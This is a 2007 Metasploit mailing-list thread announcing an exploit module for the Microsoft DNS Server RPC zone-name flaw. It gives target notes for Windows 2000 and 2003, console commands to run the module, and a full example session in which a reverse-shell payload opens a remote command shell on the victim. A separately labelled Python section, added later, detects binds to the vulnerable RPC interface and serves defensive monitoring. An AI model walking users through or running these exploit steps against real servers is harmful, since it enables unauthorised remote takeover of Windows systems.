[framework] Exploiting the Microsoft DNS RPC service
Giorgio Casali
giorgio.casali at gmail.com
Tue Apr 17 10:11:55 CDT 2007
Hi,
is it possible to have it for the Italian version?
Thanks
2007/4/16, H D Moore <hdm at metasploit.com>:
>
> The exploit module has been merged to stable, use 'Online Update' or 'svn
> update' to grab it. The module's default target will exploit Windows 2000
> SP0-SP4 and Windows 2003 SP0-SP2.
>
> All targets are designed for the English locale. If you have a non-English
> system, submit targets.
>
> The Windows 2003 SP0 target may not be reliable.
>
> The Windows 2003 SP1-SP2 targets will only work if hardware DEP is not in
> use. We use the SEH overwrite method for all targets and the /GS stack
> prevention means we will not be able to use standard hardware DEP bypass
> techniques (return to NTDLL to disable NX).
>
> The RPORT option defaults to '0' and will contact the endpoint mapper of
> the target system in order to determine the real RPC port at runtime.
> This saves a step, but it does mean that one of port 135 or 593 needs to
> be accessible on the target. If you are attacking a system with only
> ports > 1025 allowed through the firewall, you will need to locate the
> RPC service and set RPORT manually.
>
> To use the module, open the console interface, and run:
> msf> use exploit/windows/dcerpc/msdns_zonename
> msf exploit(msdns_zonename) >
> msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
> msf exploit(msdns_zonename) > set <payload options>
> msf exploit(msdns_zonename) > set RHOST <target>
> msf exploit(msdns_zonename) > exploit
>
> -- example --
>
>                 < metasploit >
>                  ------------
>                         \   ,__,
>                          \  (oo)____
>                             (__)    )\
>                                ||--|| *
>
>
>        =[ msf v3.0
> + -- --=[ 184 exploits - 104 payloads
> + -- --=[ 17 encoders - 5 nops
>        =[ 33 aux
>
> msf > use exploit/windows/dcerpc/msdns_zonename
> msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
> PAYLOAD => windows/shell_reverse_tcp
> msf exploit(msdns_zonename) > set LHOST 192.168.0.127
> LHOST => 192.168.0.127
> msf exploit(msdns_zonename) > set LPORT 4444
> LPORT => 4444
> msf exploit(msdns_zonename) > set RHOST 172.16.233.128
> RHOST => 172.16.233.128
>
> msf exploit(msdns_zonename) > exploit
> [*] Started reverse handler
> [*] Connecting to the endpoint mapper service...
> [*] Discovered Microsoft DNS Server RPC service on port 1356
> [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
> [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
> [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
> [*] Sending exploit...
> [*] Error: no response from dcerpc service
> [*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:45196)
>
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-2000 Microsoft Corp.
>
> c:\>
>
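The quoted console output shows the module locating the DNS server's RPC port through the endpoint mapper and then binding to interface 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0 over ncacn_ip_tcp. The following Python is an added example, not part of the original message or of Metasploit: it parses a connection-oriented DCE/RPC bind PDU and flags binds to that interface, which is the observable a network sensor can key on regardless of which dynamic port the endpoint mapper handed out. The PDU it checks is constructed inline for illustration, not captured traffic.

```python
import struct
import uuid

# Interface and version the module binds to, taken from the console output above.
MSDNS_RPC_IFACE = uuid.UUID("50abc2a4-574d-40b3-9d66-ee4fd5fba076")
MSDNS_RPC_VERSION = (5, 0)
NDR32_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")  # standard NDR transfer syntax

DCERPC_BIND = 11
DCERPC_ALTER_CONTEXT = 14


def parse_bind_contexts(pdu: bytes):
    """Return [(interface_uuid, (major, minor)), ...] for every presentation
    context in a DCE/RPC bind or alter_context PDU (little-endian drep only,
    which is what Windows RPC clients send)."""
    if len(pdu) < 28:
        raise ValueError("PDU too short for a bind header")
    rpc_vers, ptype, drep0 = pdu[0], pdu[2], pdu[4]
    if rpc_vers != 5 or ptype not in (DCERPC_BIND, DCERPC_ALTER_CONTEXT):
        return []
    if not drep0 & 0x10:
        raise ValueError("big-endian data representation not handled")
    frag_len, = struct.unpack_from("<H", pdu, 8)
    if frag_len > len(pdu):
        raise ValueError("frag_length exceeds captured bytes")
    # 16-byte common header, then max_xmit(2) max_recv(2) assoc_group(4), then
    # n_context_elem(1) + 3 reserved bytes; the context list starts at offset 28.
    n_ctx = pdu[24]
    off, contexts = 28, []
    for _ in range(n_ctx):
        _ctx_id, n_ts = struct.unpack_from("<HB", pdu, off)
        off += 4  # p_cont_id(2), n_transfer_syn(1), reserved(1)
        iface = uuid.UUID(bytes_le=pdu[off:off + 16])
        major, minor = struct.unpack_from("<HH", pdu, off + 16)
        off += 20 + 20 * n_ts  # abstract syntax, then each transfer syntax
        contexts.append((iface, (major, minor)))
    return contexts


def binds_to_msdns(pdu: bytes) -> bool:
    """True if any presentation context targets the DNS server RPC interface."""
    return any(i == MSDNS_RPC_IFACE and v == MSDNS_RPC_VERSION
               for i, v in parse_bind_contexts(pdu))


def build_bind(iface: uuid.UUID, version, call_id: int = 1) -> bytes:
    """Construct a minimal bind PDU (sample data for testing the parser)."""
    ctx = struct.pack("<HBB", 0, 1, 0) + iface.bytes_le + struct.pack("<HH", *version)
    ctx += NDR32_SYNTAX.bytes_le + struct.pack("<HH", 2, 0)
    body = struct.pack("<HHI", 5840, 5840, 0) + struct.pack("<BBH", 1, 0, 0) + ctx
    hdr = struct.pack("<BBBB4sHHI", 5, 0, DCERPC_BIND, 0x03,
                      b"\x10\x00\x00\x00", 16 + len(body), 0, call_id)
    return hdr + body
```

Binds arrive on whatever port the endpoint mapper assigned, so matching on the interface UUID in the bind rather than on a port number is what makes the check usable on the wire.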